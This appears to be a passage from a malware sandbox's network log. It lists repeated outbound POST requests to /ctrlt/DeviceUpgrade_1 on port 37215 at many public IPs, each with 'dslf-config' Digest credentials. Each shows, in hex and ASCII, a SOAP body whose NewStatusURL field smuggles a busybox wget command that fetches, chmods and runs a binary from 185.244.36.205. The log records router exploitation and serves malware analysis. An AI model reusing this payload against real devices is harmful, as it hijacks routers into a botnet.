                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1437192.168.2.1537998121.136.218.5937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471811056 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1438192.168.2.1556296121.254.94.14837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471811056 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1439192.168.2.155972041.119.172.4237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471823931 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1440192.168.2.154656437.106.60.337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471846104 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1441192.168.2.155068441.186.62.20737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471858978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1442192.168.2.153758045.255.53.10937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471887112 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1443192.168.2.1541080138.103.222.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471937895 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1444192.168.2.155745437.198.82.12337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471951962 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1445192.168.2.1539442150.221.246.10037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471952915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1446192.168.2.1554642156.254.150.6337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471996069 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
